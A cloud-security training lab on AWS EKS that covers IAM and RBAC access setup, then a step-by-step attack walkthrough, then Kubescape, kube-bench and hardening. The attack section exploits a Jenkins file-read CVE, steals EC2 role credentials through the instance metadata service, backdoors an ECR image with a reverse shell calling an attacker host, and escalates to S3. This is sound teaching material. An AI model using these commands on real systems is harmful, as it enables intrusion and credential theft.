    • Attach a policy that gives the user permission to access the cluster. For example, the eks:DescribeCluster permission allows the user to see details about EKS clusters.
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "DescribeAllEksClusters",
      "Effect": "Allow",
      "Action": "eks:DescribeCluster",
      "Resource": "*"
    }
  ]
}
  • Step 3: Configure AWS CLI
aws configure
  • Step 4: Update kubeconfig
aws eks update-kubeconfig --name <cluster-name>

AWS EKS Authorization

  • Step 1: Understand the aws-auth ConfigMap (deprecated)
kubectl get configmaps aws-auth -n kube-system -o yaml > auth.yaml
  • Step 2: Add IAM User to aws-auth ConfigMap
data:
  mapUsers: |
    - userarn: arn:aws:iam::ACCOUNTID:user/eks_user
      username: eks_user
  • Step 3: Define Kubernetes RBAC Roles
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: pod-manager
  namespace: default
rules:
  - apiGroups: [""]
    resources: ["pods"]
    verbs: ["create", "delete", "get", "list", "patch", "update"]
  • Step 4: Bind the Role to a User (RoleBinding)
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: pod-manager-binding
  namespace: default
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: Role
  name: pod-manager
subjects:
  - kind: User
    name: eks_user
    apiGroup: rbac.authorization.k8s.io
  • Step 5: Test the Permissions
kubectl auth can-i create pods --namespace default

Conclusion

  • Authentication happens before Authorization.
  • RBAC roles and bindings in Kubernetes control what a user can do within a specific namespace or the entire cluster.

EKS Cluster Access Management

  • In EKS, managing who has access to your cluster is crucial for security. Here’s how you can securely manage access.

ConfigMap-based Authentication

  • Earlier, the aws-auth ConfigMap was used to control access to EKS clusters. However, this approach had limitations:

    • The creator of the cluster had invisible administrative access.
    • Admin roles were not visible through the AWS API.

New EKS Cluster Access Management

  • Starting November 2023, AWS introduced EKS Cluster Access Management:

    • Access can now be granted through AWS APIs instead of relying solely on aws-auth.
    • This method provides better visibility and control over who can access the cluster.

To switch to the new access management system, it’s recommended to migrate from aws-auth ConfigMap to EKS API-based access management.

Key Concepts of EKS Cluster Access Management

  • Two important concepts in this new method are:

    • Access Entries: This is where you define which AWS user or role can access the EKS cluster.
    • Access Policies: These are predefined sets of permissions that specify what actions the user or role can perform in the cluster.
  • Authentication Modes

    • In EKS, the cluster’s access management can work in three different modes:

      • CONFIG_MAP: Uses only the aws-auth ConfigMap to manage access.
      • API: Uses only access entries created via the AWS API.
      • API_AND_CONFIG_MAP: Uses both methods, but gives preference to access entries from the API.

The default mode for most clusters is API_AND_CONFIG_MAP, which is recommended for better control.
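
On clusters that support access entries, the current mode can be inspected and changed from the CLI (a sketch; the cluster name is hypothetical):

aws eks describe-cluster --name my-eks-cluster \
  --query 'cluster.accessConfig.authenticationMode'

aws eks update-cluster-config --name my-eks-cluster \
  --access-config authenticationMode=API_AND_CONFIG_MAP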

  • Step-by-Step: Managing Cluster Access with Access Entries
    • Step 1: Create a Cluster Admin User

      • First, create an IAM user that will act as the cluster admin. Use the following command to generate access keys; refer to the example below.

        aws iam create-access-key --user-name cluster-admin
        
    • Step 2: Create an Access Entry

      • Now, create an access entry for this IAM user in the cluster; refer to the example below.

        aws eks create-access-entry --cluster-name demo-cluster \
          --principal-arn arn:aws:iam::123456789012:user/cluster-admin
        
    • Step 3: Associate an Access Policy

      • To grant admin-level access, associate the AmazonEKSClusterAdminPolicy with the access entry; refer to the example below.

        aws eks associate-access-policy --cluster-name demo-cluster \
          --principal-arn arn:aws:iam::123456789012:user/cluster-admin \
          --policy-arn arn:aws:eks::aws:cluster-access-policy/AmazonEKSClusterAdminPolicy \
          --access-scope type=cluster
        

Conclusion:

  • The aws-auth ConfigMap is deprecated but still functional for older clusters; it is the legacy approach.
  • API-based access management (access entries and access policies) is the new, recommended approach.
  • aws-iam-authenticator is embedded and doesn't require manual setup in EKS-managed clusters.


Lab: Exploiting Sample Application

In this lab, we exploit a real-world application with a CVE affecting the AWS infrastructure and, through it, the EKS cluster.

  • Change the current directory to the deployment directory eks.

    cd /workspaces/ecr_eks_security_masterclass_public/eks/
    
  • Configure the EKS Cluster.

    • Copy and paste the command generated by the following echo into the terminal to set the AWS EKS context.
    echo "Authenticate to EKS cluster via: aws eks update-kubeconfig --region $(grep 'ECR Repository URL' deployment_output.txt | awk -F'.' '{print $4}') --name $(grep 'EKS Cluster Name' deployment_output.txt | awk '{print $4}')"
    
    

    The command aws eks update-kubeconfig updates your local Kubernetes configuration (kubeconfig) file to include the AWS EKS cluster details.

    The "Updated context," means that your local kubectl command will now be able to interact with the specified EKS cluster (peachycloudsecurity-{xxxxx}) using the correct credentials and settings for that cluster in the given region (us-west-2).

    alt text

  • Access the Vulnerable Application:

    • After the deployment, you can access the vulnerable application via the public IP of the EC2 instance:

      echo "Access the application at: http://$(jq -r '.instance_public_ip.value' < ec2_output.json)"
      

      alt text

  • Copy and paste the URL into the browser to start pentesting the web application and gain access to the AWS infrastructure.

⚠️ DISCLAIMER: The next section of this lab contains the solution. If interested in challenges, STOP HERE and do not proceed to the next step. Try to exploit the application before checking the solution.

alt text

Credits for image: Offensive Security Say – Try Harder!


Enumerate & Exploit Web Application

⚠️ DISCLAIMER: This section of the lab contains the solution. If interested in challenges, STOP HERE and do not proceed. Try to exploit the application before checking the solution.


⚡ Attention ⚡

💡 Do not switch terminals unless stated below, or you'll need to re-export environment variables.

🛠️ Customization Notice 🛠️

🔧 These commands are tailored for this lab. Adapt them for your specific use case.

IPs in the snapshot might change as different labs will have different public IP.


Enumeration

  • As the application did not open in the browser, the next step is to enumerate before giving up.

alt text

Let's try harder

alt text

  • Change the directory.
cd /workspaces/ecr_eks_security_masterclass_public/eks
  • Setup the vulnerable IP as variable, so that it can be referenced.
export APP_IP=$(jq -r '.instance_public_ip.value' < ec2_output.json)

alt text

  • Let's install nmap to perform the port scan.
sudo apt install nmap -y

alt text

  • Run a quick port scan using nmap with the IP set as a variable.
nmap -Pn -T4 --top-ports 1000 --max-retries 0 $APP_IP

alt text

  • Run the curl command to validate the response.
curl -I http://$APP_IP:8080

alt text

This confirms Jenkins is running, version 2.441.

  • Search for the latest CVE associated with Jenkins 2.441.
Vulnerable to CVE-2024-23897 (Arbitrary File Read Vulnerability)

This is an arbitrary file read vulnerability, which we will exploit to get a reverse shell and access the AWS infrastructure. We could also try to brute-force the Jenkins username and password.

  • Validate the CVE-2024-23897.

CVE-2024-23897 in Jenkins stems from the args4j command parser used by the Jenkins CLI, which expands any argument beginning with an @ character into the contents of a file on the Jenkins controller. This allows attackers to read arbitrary files, and in several configurations the file read can be escalated to remote code execution.

Exploitation

  • For exploitation, download the jenkins-cli.jar file from the application running on port 8080 by running the following commands.
mkdir -p jenkins_cve
cd jenkins_cve

curl -O http://$APP_IP:8080/jnlpJars/jenkins-cli.jar

ls

alt text

  • Run the command to confirm the exploitability.
JAR_FILE="jenkins-cli.jar"
JENKINS_URL="http://$APP_IP:8080"
CMD="help"
PAYLOAD="1"
EXPLOIT_FILE="/proc/self/environ"

java -jar $JAR_FILE -s $JENKINS_URL $CMD $PAYLOAD "@$EXPLOIT_FILE"

alt text

  • Get the password of the vulnerable Jenkins instance.

In this lab, the file /var/jenkins_home/init.groovy.d/init.groovy has been made readable by the jenkins user.

JAR_FILE="jenkins-cli.jar"
JENKINS_URL="http://$APP_IP:8080"
CMD="help"
PAYLOAD="1"
EXPLOIT_FILE="/var/jenkins_home/init.groovy.d/init.groovy"

java -jar $JAR_FILE -s $JENKINS_URL -http connect-node  "@$EXPLOIT_FILE"

alt text

Additional Step

  • Change the directory to /workspaces/ecr_eks_security_masterclass_public/eks/jenkins_cve.
cd /workspaces/ecr_eks_security_masterclass_public/eks/jenkins_cve
  • Create an EC2 instance to act as the attacker machine for the reverse shell.

This instance will be deployed in the us-east-1 region, and the lab will be deleted once this section is complete. While using 0.0.0.0/0 for security group configuration is not recommended as a best practice, we will use this insecure configuration to simplify the setup.

aws ec2 create-key-pair --key-name peachycloudsecurity --query 'KeyMaterial' --output text --region us-east-1 > peachycloudsecurity.pem &&
chmod 400 peachycloudsecurity.pem &&
export SG_ID=$(aws ec2 create-security-group --group-name peachycloudsecurity-sg --description "Allow all traffic" --region us-east-1 --query 'GroupId' --output text) &&
aws ec2 authorize-security-group-ingress --group-id $SG_ID --protocol -1 --port all --cidr 0.0.0.0/0 --region us-east-1 &&
export INSTANCE_ID=$(aws ec2 run-instances --image-id ami-0ebfd941bbafe70c6 --instance-type t2.micro --key-name peachycloudsecurity --security-group-ids $SG_ID --region us-east-1 --query 'Instances[0].InstanceId' --output text) &&
aws ec2 wait instance-running --instance-ids $INSTANCE_ID --region us-east-1 &&
export PUBLIC_IP=$(aws ec2 describe-instances --instance-ids $INSTANCE_ID --region us-east-1 --query 'Reservations[0].Instances[0].PublicIpAddress' --output text) &&
sleep 10
  • Export attacker's ec2 instance IP variables.
export ATTACKER_PUBLIC_IP=$(aws ec2 describe-instances --filters "Name=key-name,Values=peachycloudsecurity" "Name=instance-state-name,Values=running" --query 'Reservations[0].Instances[0].PublicIpAddress' --output text --region us-east-1)

  • Confirm the public IP by echo command.

If this output is blank, the attacker's EC2 instance is not running or has an issue.

echo $ATTACKER_PUBLIC_IP

Reference

  • https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2024-23897

Using IMDSv2 to exfiltrate Credentials

⚡ Attention ⚡

💡 Do not switch terminals unless stated below, or you'll need to re-export environment variables.

🛠️ Customization Notice 🛠️

🔧 These commands are tailored for this lab. Adapt them for your specific use case.


  • For this lab, there is no reverse shell yet; instead, we will directly exploit the IMDSv2 metadata API.
    • Make sure you are inside jenkins_cve folder.
    • If not, run the command to change directory.
cd /workspaces/ecr_eks_security_masterclass_public/eks/jenkins_cve
  • Setup the vulnerable IP as variable, so that it can be referenced.
export APP_IP=$(jq -r '.instance_public_ip.value' < ../ec2_output.json)
  • Get the URL.
echo $APP_IP

Jenkins Freestyle Pipeline to Run Command

  • Log in to Jenkins with the username and password obtained in the previous section.

alt text

  • Access Jenkins:
    • Open your Jenkins dashboard in your browser.

alt text

  • Create a New Freestyle Project:
    • Click on "New Item" from the Jenkins dashboard.
    • Enter a project name (e.g., Simple_LS_Pipeline).
    Simple_LS_Pipeline
    
    • Select Freestyle project and click "OK."

alt text

  • Configure the Project:

    • On the project configuration page, scroll down to the Build Steps section.
  • Add a Build Step

    • Under the Build Steps section, click on Add build step.
    • Select Execute shell (for Linux/Mac).

alt text

  • In the Execute shell, add the command to extract the AWS temporary keys.

Run this inside Jenkins pipeline.

TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")

IAM_ROLE=$(curl -H "X-aws-ec2-metadata-token: $TOKEN" "http://169.254.169.254/latest/meta-data/iam/security-credentials/")

curl -H "X-aws-ec2-metadata-token: $TOKEN" "http://169.254.169.254/latest/meta-data/iam/security-credentials/$IAM_ROLE"

alt text

AWS keys starting with ASIA are temporary credentials; keys starting with AKIA are permanent (long-term) credentials.

  • Save the Configuration:

    • Scroll down and click Save.
  • Run the Job:

    • On the project page, click Build Now to run the pipeline. Wait a few seconds.

    alt text
  • Check Console Output:

    • After the job completes, click on the build number in the Build History.
    • Select Console Output to view the result of the commands.

alt text

  • Check the results with Access Key, Secret Key and Session Token.

alt text

  • To download the result.
    • Click on View as plain text.

alt text

  • Copy the URL.

alt text

  • Download the file onto the codespace terminal.

Make sure to validate the build ID and the name of the freestyle job before downloading the file.

wget -O cred.txt http://$APP_IP:8080/job/Simple_LS_Pipeline/1/consoleText
In case of error, check the correct build ID before downloading cred.txt.

alt text

  • Check the cred.txt to make sure we have valid credentials.
grep -q '"AccessKeyId"' cred.txt && grep -q '"SecretAccessKey"' cred.txt && echo "Valid cred.txt" || echo "Error: Check the console log manually. Invalid cred.txt"
  • Make sure the current directory is jenkins_cve.
export AWS_ACCESS_KEY_ID=$(grep -oP '(?<="AccessKeyId" : ")[^"]*' cred.txt) \
&& export AWS_SECRET_ACCESS_KEY=$(grep -oP '(?<="SecretAccessKey" : ")[^"]*' cred.txt) \
&& export AWS_SESSION_TOKEN=$(grep -oP '(?<="Token" : ")[^"]*' cred.txt)
  • Validate the exported AWS credentials.
aws sts get-caller-identity

alt text

  • This confirms we have exploited the IMDSV2 and extracted the AWS EC2 credentials.

Reference

  • https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2024-23897

Enumerate ECR repositories using credentials

⚡ Attention ⚡

💡 Do not switch terminals unless stated below, or you'll need to re-export environment variables.

🛠️ Customization Notice 🛠️

🔧 These commands are tailored for this lab. Adapt them for your specific use case.


  • Change directory
cd /workspaces/ecr_eks_security_masterclass_public/eks/jenkins_cve 
  • Again export the credentials.
export AWS_ACCESS_KEY_ID=$(grep -oP '(?<="AccessKeyId" : ")[^"]*' cred.txt) \
&& export AWS_SECRET_ACCESS_KEY=$(grep -oP '(?<="SecretAccessKey" : ")[^"]*' cred.txt) \
&& export AWS_SESSION_TOKEN=$(grep -oP '(?<="Token" : ")[^"]*' cred.txt)
curl -L https://github.com/securisec/cliam/releases/download/2.2.0/cliam-linux-64bit.tar.gz | tar -xz && sudo mv cliam /usr/local/bin/ && sudo chmod +x /usr/local/bin/cliam 

  • Let's enumerate the permissions manually.

As this lab is related to EKS & ECR, we will directly enumerate these services.

aws ecr describe-repositories
aws ecr describe-registry
aws eks list-clusters 
🚨 Solution: In case of error: An error occurred (AccessDeniedException) 😱.
⚠️ *Don't cheat! Still want the answer?* 👉 *Click below if you're sure...*

alt text

  • Let's use cliam to enumerate the permissions of EKS and ECR.
cliam aws enumerate --access-key-id $AWS_ACCESS_KEY_ID --secret-access-key $AWS_SECRET_ACCESS_KEY --session-token $AWS_SESSION_TOKEN ecr

cliam aws enumerate --access-key-id $AWS_ACCESS_KEY_ID --secret-access-key $AWS_SECRET_ACCESS_KEY --session-token $AWS_SESSION_TOKEN eks
⚠️ In case still facing issue No valid aws services detected by cliam as well? 😱.
👉 *Check this below..*

alt text

  • Let's run the cliam command again; review the change in the commands below for both services (a region is now passed explicitly).
for region in us-east-1 us-west-2; do cliam aws enumerate --access-key-id "$AWS_ACCESS_KEY_ID" --secret-access-key "$AWS_SECRET_ACCESS_KEY" --session-token "$AWS_SESSION_TOKEN" ecr --region $region; done

for region in us-east-1 us-west-2; do cliam aws enumerate --access-key-id "$AWS_ACCESS_KEY_ID" --secret-access-key "$AWS_SECRET_ACCESS_KEY" --session-token "$AWS_SESSION_TOKEN" eks --region $region; done
  • Set the default region using one-liner before proceeding further.

This will set the default region based on output.

for region in us-east-1 us-west-2; do
  output=$(cliam aws enumerate --access-key-id "$AWS_ACCESS_KEY_ID" --secret-access-key "$AWS_SECRET_ACCESS_KEY" --session-token "$AWS_SESSION_TOKEN" ecr --region $region)
  
  if echo "$output" | grep -q "INF"; then
    echo "Setting region $region as default"
    export AWS_DEFAULT_REGION=$region
    break
  fi
done
  • Using describe-repositories, list the images from ECR.
export repo=$(aws ecr describe-repositories --query 'repositories[0].repositoryName' --output text) && aws ecr list-images --repository-name "$repo"
  • Similarly list the cluster running.

The cluster starting with peachycloudsecurity-<randomvalue> is the lab cluster.

aws eks list-clusters 
  • Pull the image from the ECR repository. Also get the current image tag.

As attackers we don't know what tag the image uses, so we use aws ecr list-images to get the latest tag.

export repo=$(aws ecr describe-repositories --query 'repositories[0].repositoryUri' --output text) && export image=$(aws ecr list-images --repository-name $(echo $repo | cut -d'/' -f2) --query 'imageIds[0].imageTag' --output text) 

docker pull "$repo:$image"
  • As the tag has been identified, in this case latest:
    • Pull the same image with the latest tag to demonstrate that an attacker can first identify the correct tag and then pull the image.
    • The attacker can also try to guess and pull other image tags using common naming patterns; see the sketch after the next command.

In real life, the tag of a Docker image varies by organization. An attacker can pull the image and then re-push it with the same Docker image tag.

repo=$(aws ecr describe-repositories --query 'repositories[0].repositoryUri' --output text)
image_tag="latest"
docker pull "$repo:$image_tag"
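
As a sketch of the tag-guessing approach mentioned above, an attacker could iterate over common tag names (the tag list is an illustrative assumption):

for tag in latest stable prod dev v1; do
  docker pull "$repo:$tag" 2>/dev/null && echo "Found tag: $tag"
done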


Backdooring a Docker Image

⚡ Attention ⚡

💡 Continue using the same terminal. Do not switch terminals unless stated below, or you'll need to re-export environment variables.

  • Change directory to jenkins_cve to make sure the folder structure matches the lab steps.
cd /workspaces/ecr_eks_security_masterclass_public/eks/jenkins_cve 
  • Set the repo
export repo=$(aws ecr describe-repositories --query 'repositories[0].repositoryUri' --output text)
export image_tag="latest"
  • Set the default region based on the ECR repository URI, then log in to AWS ECR.
export AWS_DEFAULT_REGION=$(echo "$repo:$image_tag" | awk -F. '{print $4}')

export aws_account_id=$(aws sts get-caller-identity --query "Account" --output text) && aws ecr get-login-password | docker login --username AWS --password-stdin $aws_account_id.dkr.ecr.$AWS_DEFAULT_REGION.amazonaws.com
  • Pull the image to be backdoored.
docker pull "$repo:$image_tag"
  • Generate the backdoored image.
python3 ../solution/backdoor.py \
  --input "$repo:$image_tag" \
  --output "$repo:$image_tag" \
  --listener "$ATTACKER_PUBLIC_IP" \
  --port 1337 \
  --shell-url "https://github.com/cr0hn/dockerscan/raw/master/dockerscan/actions/image/modifiers/shells/reverse_shell.so"

alt text

  • Push the backdoor image.
docker push $repo:$image_tag

Exploiting AWS EKS Cluster

alt text

⚡ Preparing the attacker's terminal ⚡

Open a new terminal in the codespace and SSH into the attacker's EC2 instance to catch the reverse shell from the backdoor and exploit EKS.

  • Change directory to /workspaces/ecr_eks_security_masterclass_public/eks/jenkins_cve.
cd /workspaces/ecr_eks_security_masterclass_public/eks/jenkins_cve
  • Get the public IP of attacker's ec2 instance & ssh.

This simulates the attacker catching the reverse shell from inside the EC2 instance.

export ATTACKER_PUBLIC_IP=$(aws ec2 describe-instances --filters "Name=key-name,Values=peachycloudsecurity" "Name=instance-state-name,Values=running" --query 'Reservations[0].Instances[0].PublicIpAddress' --output text --region us-east-1)


ssh -i peachycloudsecurity.pem ec2-user@$ATTACKER_PUBLIC_IP
  • Install pwncat-cs (alternative to netcat for reverse shell)
sudo yum install python3-pip -y # For CentOS/RHEL/Amazon Linux
sudo python3 -m pip install pwncat-cs

Get the Reverse Shell as Attacker

As we have pushed the backdoored image, start the listener and wait for the connection from the EKS pod.

Wait up to 5 minutes for the reverse shell from the EKS pod.

  • Run the pwncat-cs to get the reverse shell.

Similar to netcat

pwncat-cs 0.0.0.0 1337
  • Hit CTRL+D to get the pod's shell.

Run these commands within the pod after getting the reverse shell.

  • Install kubectl, run the following commands based on the system's architecture.
echo "Installing kubectl..."
ARCH=$(uname -m)
case $ARCH in
    x86_64) BIN_ARCH="amd64" ;;
    aarch64) BIN_ARCH="arm64" ;;
    *) echo "Unsupported architecture: $ARCH"; exit 1 ;;
esac
curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/$BIN_ARCH/kubectl"
install -o root -g root -m 0755 kubectl /usr/local/bin/kubectl
echo "kubectl installation complete."

Again run the pwncat-cs listener to get the reverse shell if exited.

  • Set the Kubernetes configuration explicitly with the service account token, CA certificate, and API server URL.
# Set the correct KUBERNETES_SERVICE_HOST
export KUBERNETES_SERVICE_HOST=kubernetes.default.svc

# Get the service account token and CA certificate
export TOKEN=$(cat /run/secrets/kubernetes.io/serviceaccount/token)
export CACERT=/run/secrets/kubernetes.io/serviceaccount/ca.crt

# Set up the kubectl configuration to use the token
kubectl config set-cluster default-cluster --server=https://${KUBERNETES_SERVICE_HOST}:443 --certificate-authority=${CACERT}
kubectl config set-credentials default-admin --token=${TOKEN}
kubectl config set-context default-system --cluster=default-cluster --user=default-admin
kubectl config use-context default-system

To get the cluster IP, run kubectl get svc -n default kubernetes.

Perform post-exploitation enumeration in the EKS cluster.

  • Check permissions using auth can-i
kubectl auth can-i --list
  • Now run kubectl commands.
kubectl get pods

kubectl get pods -A 
  • Get cluster roles & roles
kubectl get roles
kubectl get clusterroles
  • Get namespaces of the cluster.

A namespace is a virtual cluster that helps divide and isolate resources (like pods, services, and deployments) within a physical cluster

kubectl get namespaces
  • Get secrets to check if any secret is present or accessible.
kubectl get secrets -A
⚠️ In such a short time, do we have any other way to get the flag? 😱.

Use IMDSV2 to get the credentials and use it on local. Before that, let's see the next lab.


Breakout from Pod to Node using privileged credentials

Continue using the same terminal.

Again run the pwncat-cs listener to get the reverse shell.

  • Inside the EKS pod, run the commands below.
apt update && apt install unzip less -y
  • Install aws cli
curl "https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip" -o "awscliv2.zip"
unzip awscliv2.zip
./aws/install
rm -rf awscliv2.zip aws

If you exited the EKS pod, exit pwncat-cs by typing exit.

Again run the pwncat-cs listener to get the reverse shell.

Again, perform IAM enumeration.

  • Run aws cli commands
aws sts get-caller-identity
  • To check whether the pod is using the node's IAM role or a pod-level identity (IRSA or EKS Pod Identity):

    • Check for annotations in environment variables
    env | grep AWS_ROLE_ARN
    env | grep AWS_WEB_IDENTITY_TOKEN_FILE
    
    • Check if the pod is using node's IAM role via IMDS V1.

    With IMDSv2, you need to send a PUT request first and then pass the returned token in a header.

    curl 169.254.169.254/latest/meta-data/iam/security-credentials/
    
    • Verify the service account attached to the pod by checking for the annotation that links the service account to an IAM role.
    kubectl get serviceaccount <service-account-name> -o yaml
    
⚠️ In such a short time, do we have any other way to get the flag? 😱.
Use IMDSV2 to get the credentials and use it on local.
echo "This can trigger guardduty and other monitoring solutions like Falco as this is suspicious command."

TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")

IAM_ROLE=$(curl -H "X-aws-ec2-metadata-token: $TOKEN" "http://169.254.169.254/latest/meta-data/iam/security-credentials/")

curl -H "X-aws-ec2-metadata-token: $TOKEN" "http://169.254.169.254/latest/meta-data/iam/security-credentials/$IAM_ROLE"

Exit from the pod, the pwncat interactive shell, and the attacker's EC2 instance.

Create a new file in codespace and paste the exfiltrated json data including AccessKeyId, SecretAccessKey & SessionToken.

  • Copy and paste the JSON-like object into a txt file.
cd /workspaces/ecr_eks_security_masterclass_public/eks/jenkins_cve 
touch leaked.txt
  • Output should look like this
{
    "Credentials": {
        "AccessKeyId": "ASIAXXXXXX",
        "SecretAccessKey": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYXXXXX",
        "SessionToken": "IQoJb3JpZ2luX2VjEXAMPLEXXXX...",
        "Expiration": "2024-09-30T23:59:59Z"
    }
}

Manual Steps Involved...

  • Export the temporary credentials to get the permissions of the node.
export AWS_ACCESS_KEY_ID="ASIAXXXXXX"
export AWS_SECRET_ACCESS_KEY="wJalrXUtnFEMI/K7MDENG/bPxRfiCYXXXXX"
export AWS_SESSION_TOKEN="IQoJb3JpZ2luX2VjEXAMPLEXXXX..."
export DEFAULT_REGION="us-east-1"  # or us-west-2, depending on where the lab was deployed
  • Run the aws cli command to confirm permissions.

This confirms we have obtained the EKS node's permissions, confirming the breakout.

aws sts get-caller-identity 
  • Enumerate IAM
cd /workspaces/ecr_eks_security_masterclass_public/eks/jenkins_cve 
git clone https://github.com/andresriancho/enumerate-iam.git
cd enumerate-iam

python3 -m pip install -r requirements.txt
  • Manually replace these values from the file and run the tool.

Make sure to update the region as per the preference.

python3 enumerate-iam.py --access-key $AWS_ACCESS_KEY_ID --secret-key $AWS_SECRET_ACCESS_KEY --session-token $AWS_SESSION_TOKEN --region $DEFAULT_REGION

alt text

Check that there is permission to list S3 buckets.

  • Hit Ctrl+C again to force exit (the same shortcut applies on macOS).

Lab: Privilege Escalation & S3 Exploitation for Flag

Continue using the same terminal on which exfiltrated credentials are configured.

  • Change directory to jenkins_cve.
cd /workspaces/ecr_eks_security_masterclass_public/eks/jenkins_cve 
  • Use node credentials to list internal s3 bucket and get the flag.

S3 endpoints are region-agnostic.

aws s3 ls

  • Get the data from the internal bucket, demonstrating that the attacker was able to exfiltrate it.
export VICTIM_BUCKET=$(aws s3 ls | grep 'peachycloudsecurity-' | awk '{print $3}')

aws s3 ls s3://$VICTIM_BUCKET
aws s3 cp s3://$VICTIM_BUCKET/flag.txt . && cat flag.txt

Lab: Cleanup EC2 Instance

Open new codespace terminal.

alt text

Attacker's EC2 Deletion Steps:

  • Change the directory
cd /workspaces/ecr_eks_security_masterclass_public/eks/jenkins_cve
  • Terminate the EC2 instance.

If you changed to another region, replace the region accordingly.

export AWS_DEFAULT_REGION=us-east-1

export INSTANCE_ID=$(aws ec2 describe-instances --filters "Name=key-name,Values=peachycloudsecurity" "Name=instance-state-name,Values=running" --query 'Reservations[0].Instances[0].InstanceId' --output text --region $AWS_DEFAULT_REGION)

aws ec2 terminate-instances --instance-ids $INSTANCE_ID --region $AWS_DEFAULT_REGION
  • Check instance termination.
aws ec2 describe-instances --instance-ids $INSTANCE_ID --region $AWS_DEFAULT_REGION --query 'Reservations[0].Instances[0].State.Name'
  • Delete the key pair.
aws ec2 delete-key-pair --key-name peachycloudsecurity --region $AWS_DEFAULT_REGION
  • Remove the local key file:
rm -f peachycloudsecurity.pem

Automated Scanning in EKS: Why, What, and How

Why Automated Scanning?

Automated scanning in Amazon Elastic Kubernetes Service (EKS) is crucial for maintaining the security and compliance of your containerized applications. Kubernetes, while powerful, has complex configurations and multiple layers (containers, images, nodes, etc.) that can expose vulnerabilities if left unchecked. Automated scanning ensures:

  • Proactive Security: Identify vulnerabilities, misconfigurations, and compliance issues early.
  • Consistency: Continuously monitor the cluster without manual intervention.
  • Compliance: Align with security standards like CIS Benchmarks and other industry best practices.

What is Automated Scanning?

Automated scanning involves using tools and frameworks to automatically:

  1. Scan Container Images: Identify outdated libraries, vulnerabilities, or insecure packages in your container images.
  2. Audit Kubernetes Configurations: Ensure best practices are followed in deployment files, manifests, and cluster configurations.
  3. Assess Runtime Security: Monitor active workloads for abnormal behavior or misconfigurations.
  4. Enforce Compliance Standards: Generate reports based on predefined policies or benchmarks.

How Does Automated Scanning Work?

  1. Integration with CI/CD Pipelines:
    • Tools are integrated during the build or deployment phase to catch issues early (e.g., image scanning before deployment).
  2. Continuous Cluster Monitoring:
    • Agents or tools run within the EKS cluster to monitor configurations, permissions, and runtime behavior.
  3. Policy Enforcement:
    • Define security policies that trigger alerts or block deployments if violations are detected.
  4. Reporting and Alerts:
    • Centralized dashboards and notifications help teams prioritize and fix issues effectively.

Next Steps

In the next chapter, we’ll explore Kubescape and Kubebench, two essential tools for auditing and securing your Kubernetes clusters. These tools provide automated scanning capabilities for configurations, workloads, and compliance checks tailored for Kubernetes environments.

Hands-On Lab: Security Auditing with Kubescape

Kubescape is a Kubernetes security scanner that checks for misconfigurations, vulnerabilities, and compliance against frameworks like NSA-CISA and MITRE ATT&CK. This hands-on lab guides you through setting up and running Kubescape in a simple namespace.

Hands on Lab

  • Navigate to the EKS Directory:

    cd /workspaces/ecr_eks_security_masterclass_public/eks/
    
  • Install Kubescape on your system:

    curl -s https://raw.githubusercontent.com/kubescape/kubescape/master/install.sh | bash
    
  • Verify the installation:

    export PATH=$PATH:/home/codespace/.kubescape/bin
    
    kubescape version
    
  • Run a basic scan for the entire cluster:

    kubescape scan framework nsa
    
  • To scan a specific namespace, create a namespace and deploy a sample workload:

    kubectl create namespace kubescape-lab
    kubectl run nginx --image=nginx --namespace=kubescape-lab
    
  • Scan only the kubescape-lab namespace:

    kubescape scan framework nsa --include-namespaces kubescape-lab
    
  • After running the scan, you’ll see results highlighting:

    • Critical issues (e.g., misconfigured RBAC, insecure ports).
    • Compliance status.
  • Save the results to a file for further review:

    kubescape scan framework nsa --output json > kubescape-results.json
    

Cleanup(Optional)

  • Delete the namespace and resources:

    kubectl delete namespace kubescape-lab
    
  • Remove Kubescape:

    rm $(which kubescape)
    

Hands-On Lab: Security Benchmarking with Kubebench

Kubebench checks your Kubernetes cluster against the CIS (Center for Internet Security) Kubernetes Benchmark. This lab demonstrates how to install and run Kubebench to ensure your cluster aligns with security best practices.

Hands on Lab

  • Navigate to the EKS directory:

    cd /workspaces/ecr_eks_security_masterclass_public/eks/
    
  • Download the Kubebench YAML file for your cluster:

    curl -sLO https://raw.githubusercontent.com/aquasecurity/kube-bench/main/job.yaml
    
  • Apply the YAML file to create a Kubebench job:

    kubectl apply -f job.yaml
    
  • Wait for the job to complete:

    kubectl get jobs
    
  • Retrieve the results from the job pod:

    POD_NAME=$(kubectl get pods --selector=job-name=kube-bench -o jsonpath='{.items[0].metadata.name}')
    kubectl logs $POD_NAME
    
  • Review the output for failed checks.

  • Each check aligns with the CIS benchmark, such as:

    • API server security configurations.
    • Pod security settings.
    • RBAC configurations.

Optional Cleanup

  • Delete the Kubebench job and resources:
    kubectl delete -f job.yaml
    

Defense & Hardening in EKS

Effective defense and hardening in Amazon EKS involve securing workloads, enforcing compliance, and detecting runtime threats. Below are key focus areas:

Pod and Container Security Context

  • Use Kubernetes security contexts to define permissions and constraints at the pod/container level.
  • Enforce practices like:
    • Running containers as non-root users.
    • Setting the file system as read-only.
    • Restricting privilege escalation.
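
A container-level securityContext combining these practices might look like the following fragment (values are illustrative):

securityContext:
  runAsNonRoot: true            # refuse to start if the image would run as root
  runAsUser: 1000               # run processes as a non-root UID
  allowPrivilegeEscalation: false
  readOnlyRootFilesystem: true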

Policy Enforcement with Kyverno and CEL

  • Kyverno: A Kubernetes-native policy engine to validate, mutate, and enforce best practices.
  • CEL (Common Expression Language): Lightweight expressions for custom rules in admission controllers.
  • Define policies for image scanning, resource limits, and namespace isolation.

Threat Detection with AWS GuardDuty

  • A managed threat detection service integrating with EKS.
  • Detects anomalies, such as suspicious API calls, unauthorized access, and malicious behavior in the control plane and nodes.
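
Enabling GuardDuty in a region takes a single CLI call (a sketch; if a detector already exists, the call returns an error that can be ignored):

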